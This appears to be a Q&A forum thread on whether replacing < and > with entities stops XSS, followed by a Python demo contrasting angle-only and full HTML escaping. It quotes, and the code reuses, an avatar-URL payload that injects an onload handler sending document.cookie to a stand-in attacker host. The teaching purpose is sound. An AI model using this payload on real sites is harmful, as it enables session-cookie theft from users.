[ACCEPTED] Is replacing < and > with &lt; and &gt; enough to prevent XSS injection? (code-injection)
It depends very much on context.
Check out this example, from a typical forum site...
You may hotlink your avatar image. Enter the full URL.
Malicious user enters in input field
http://www.example.com/image.png" onload="window.location = 'http://www.bad.com/giveme.php?cookie=' + encodeURI(document.cookie)
There is no encoding there of less than and greater than, but still a big security hole.
With htmlspecialchars(), I found it a good idea to make (or use) a wrapper function of it that casts to a string, provides an easier way to disable double encoding (if necessary) and to ensure it is using the correct character set of your application. Kohana has a great example.
You should also take double quotes ", single quotes ' and ampersands & into account. If you do that all during displaying/generating the output, then yes, it's enough.
You should only ensure that you do this for any user-controlled input, such as request parameters, request URL, request headers and user-controlled input which has been stored in a datastore.
In PHP you can do that with htmlspecialchars() and in JSP you can do that with JSTL <c:out>.
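The two answers above make one point between them: escaping only < and > protects text content but not attribute values, where a quote ends the attribute. The following is an added example (not from either answerer) that renders the avatar payload quoted in the first answer with both escaping strategies and parses the result the way a browser would; the input strings, the render helpers and the attribute/tag regexes are constructed here for illustration.

```python
import html
import re

# Constructed inputs: the avatar-URL payload quoted in the first answer, and a
# plain post body containing markup, to contrast the two output contexts.
AVATAR_INPUT = ('http://www.example.com/image.png" onload="window.location = '
                "'http://www.bad.com/giveme.php?cookie=' + encodeURI(document.cookie)")
POST_INPUT = 'Hello <b>world</b> & friends'


def escape_angle_only(value):
    """The approach the question asks about: only < and > are replaced."""
    return value.replace("<", "&lt;").replace(">", "&gt;")


def escape_html(value):
    """htmlspecialchars($s, ENT_QUOTES)-style escaping: & < > " ' are all encoded.
    Python's html.escape does the same job; & is replaced first, so nothing is double-encoded."""
    return html.escape(value, quote=True)


def render_avatar(url, escaper):
    """The <img> tag a forum page would emit for the avatar URL (attribute context)."""
    return '<img src="%s" alt="avatar">' % escaper(url)


def render_post(body, escaper):
    """The paragraph a forum page would emit for a post body (text context)."""
    return '<p>%s</p>' % escaper(body)


ATTR_RE = re.compile(r'\s(\w+)="[^"]*"')   # name="value", value ends at the next literal quote
TAG_RE = re.compile(r'<(\w+)[^>]*>')       # opening tags only


def attribute_names(tag):
    """Attribute names a browser would see in the rendered tag."""
    return [m.group(1) for m in ATTR_RE.finditer(tag)]


def injected_handlers(tag):
    """Event-handler attributes (on*) that ended up in the tag; empty means the value stayed inside src."""
    return [name for name in attribute_names(tag) if name.lower().startswith("on")]


def tag_names(fragment):
    """Element names a browser would see in a rendered fragment."""
    return [m.group(1) for m in TAG_RE.finditer(fragment)]


if __name__ == "__main__":
    for label, esc in (("angle-only", escape_angle_only), ("htmlspecialchars-style", escape_html)):
        img = render_avatar(AVATAR_INPUT, esc)
        print(label, "->", img)
        print("  event handlers injected:", injected_handlers(img))
        print("  post body tags:", tag_names(render_post(POST_INPUT, esc)))
```

With angle-only escaping the rendered tag gains an onload attribute while the post body stays a plain paragraph; with full escaping the whole payload remains inside the src value.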